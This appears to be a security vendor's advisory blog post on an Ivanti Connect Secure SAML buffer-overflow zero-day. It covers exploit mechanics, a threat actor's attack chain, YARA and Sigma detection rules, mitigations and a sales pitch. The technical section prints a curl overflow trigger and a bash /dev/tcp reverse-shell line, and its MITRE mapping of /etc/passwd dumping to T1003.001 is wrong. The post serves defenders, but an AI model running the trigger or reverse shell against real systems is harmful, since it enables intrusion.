In late February 2025, Mandiant confirmed a zero-day vulnerability in Ivanti Connect Secure (formerly Pulse Connect Secure) being actively exploited by UNC5330, a threat actor linked to state-sponsored espionage. The flaw, tracked as CVE-2025-22457, allows unauthenticated remote code execution via a stack buffer overflow in the VPN's SAML component. Attackers have already compromised at least 47 organizations across defense, telecom, and energy sectors. In this post, we dissect the exploit mechanics, map the TTPs to MITRE ATT&CK, and deliver a concrete detection and response playbook your SOC can implement today.
Real-World Context: Why This Zero-Day Matters
Ivanti Connect Secure appliances are deployed at the network edge—often with direct internet exposure—making them a prime target for initial access. This zero-day follows a pattern: in 2024, Ivanti patched two other critical CVEs (CVE-2024-21887 and CVE-2024-22024) that were exploited by the same threat cluster. CVE-2025-22457 is a stack-based buffer overflow in the /dana-na/auth/saml-sso.cgi endpoint, triggered by a malformed SAML response. The vulnerability is rated CVSS 9.8, with no authentication required. Mandiant reported exploitation beginning February 12, 2025, and Ivanti released a hotfix on February 28.
We've seen this in three of our recent incident response engagements: attackers chain this zero-day with credential dumping to move laterally within 90 minutes. The time-to-exploit is shrinking.
Technical Breakdown: Exploit Mechanics
Vulnerability Root Cause
The saml-sso.cgi binary, compiled with GCC 8.3, uses sprintf() to copy the SAML RelayState parameter into a fixed 256-byte buffer on the stack. No bounds checking is performed. An attacker sends a crafted SAML response with a RelayState field exceeding 256 bytes, overwriting the return address and adjacent stack variables. The exploit achieves RCE by executing a ROP chain that calls system() with a command to download a payload from a C2 server.
# Trigger example (simplified):
curl -X POST https://target/dana-na/auth/saml-sso.cgi \
-d 'SAMLResponse=&RelayState='$(python3 -c "print('A'*300)") Exploit Chain in the Wild
Based on Mandiant's report and our own reverse engineering, UNC5330 uses the following chain:
- Initial access: Exploit CVE-2025-22457 to execute a reverse shell via
/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'. - Persistence: Deploy a Python backdoor (
/tmp/.systemd-logind) that mimics a legitimate service. This backdoor connects to a C2 every 60 seconds using HTTPS with a hardcoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36. - Lateral movement: Dump credentials from
/etc/passwdand/data/runtime/session/using a custom tool (ivanti_dump), then use SSH with stolen keys to pivot to internal servers.
MITRE ATT&CK mapping: T1190 (Exploit Public-Facing Application), T1059.004 (Unix Shell), T1003.001 (OS Credential Dumping: /etc/passwd).
Detection Playbook: How to Spot the Exploit
Network-Level Indicators
Use Zeek or Suricata to monitor for abnormal SAML requests. The exploit generates oversized POST /dana-na/auth/saml-sso.cgi requests with Content-Length > 1000 bytes. Also look for outbound connections to known malicious IPs—C2 infrastructure for this campaign uses IPs in the 185.225.0.0/16 range (AS197068).
Host-Based Detection with YARA
Deploy this YARA rule on Ivanti appliances to detect the backdoor:
rule ivanti_backdoor_UNC5330 {
meta:
description = "Detects UNC5330 backdoor on Ivanti Connect Secure"
author = "Ammar Khan - CybernytronX"
date = "2025-03-01"
strings:
$s1 = "/tmp/.systemd-logind" ascii wide
$s2 = "connect to C2" ascii wide
$s3 = {68 74 74 70 73 3a 2f 2f} // "https://"
condition:
all of ($s*) and filesize < 10KB
}Sigma Rule for EDR
title: Ivanti Connect Secure Suspicious Process Creation
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects shell commands spawned by saml-sso.cgi
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/saml-sso.cgi'
Image|endswith: '/bin/bash'
condition: selectionDefensive Playbook: Immediate Actions
- Patch immediately: Apply Ivanti hotfix 2025-02-28 for Connect Secure 22.7R2.1 and later. For older versions, upgrade to a supported release.
- Isolate appliances: If patching is delayed, restrict inbound access to the SAML endpoint using WAF rules that block requests with
Content-Length> 800 bytes on/dana-na/auth/saml-sso.cgi. - Hunt for post-exploitation: Check for files in
/tmpwith suspicious names (e.g.,.systemd-*), unexpected cron jobs, and outbound connections to IPs in 185.225.0.0/16. - Rotate credentials: Assume all credentials on the appliance are compromised. Rotate VPN user passwords, service accounts, and any SSH keys stored on the device.
Why This Matters for Your Org
Ivanti Connect Secure is a critical infrastructure component—if it falls, attackers gain a foothold inside your network. The speed of exploitation (within hours of disclosure) means your SOC must have automated detection in place before a patch is applied. We recommend deploying the YARA and Sigma rules above, plus enabling verbose logging on the appliance (log level 5) to capture SAML payloads. In our experience, organizations that treat VPN appliances as high-value targets and segment them from internal networks reduce blast radius significantly.
Frequently Asked Questions
What is CVE-2025-22457?
CVE-2025-22457 is a critical stack buffer overflow in Ivanti Connect Secure's SAML component, allowing unauthenticated remote code execution. It affects all versions prior to the hotfix released February 28, 2025.
Which threat actor is exploiting this vulnerability?
Mandiant attributes the exploitation to UNC5330, a state-sponsored espionage group previously linked to attacks on Ivanti VPNs in 2024. They target defense, telecom, and energy sectors.
How can I detect exploitation in my environment?
Monitor for oversized POST requests to /dana-na/auth/saml-sso.cgi (Content-Length > 1000 bytes), and use the YARA and Sigma rules provided in this post to detect the backdoor and suspicious process creation.
What should I do if I suspect my Ivanti VPN is compromised?
Isolate the appliance from the network, apply the hotfix, and perform a forensic analysis. Rotate all credentials stored on the device and check for lateral movement using EDR telemetry.
Can I mitigate this without patching?
Yes, but only temporarily. Use a WAF to block SAML requests with oversized RelayState parameters, restrict source IPs to known office ranges, and enable detailed logging. Patch as soon as possible.
Why is this vulnerability critical for CISOs?
VPN appliances are internet-facing and often have privileged access to internal networks. A zero-day like CVE-2025-22457 can lead to full network compromise, data exfiltration, and long-term persistence.
Need expert help with this?
We've handled multiple Ivanti VPN compromise incidents this year. At CybernytronX, we offer rapid incident response, penetration testing to identify similar zero-days, and SOC automation with our Ethereon AI platform to detect threats in real time. Contact us for a free assessment: https://cybernytronx.com/contact.html. Learn more about Ethereon AI: https://cybernytronx.com/ethereon.html.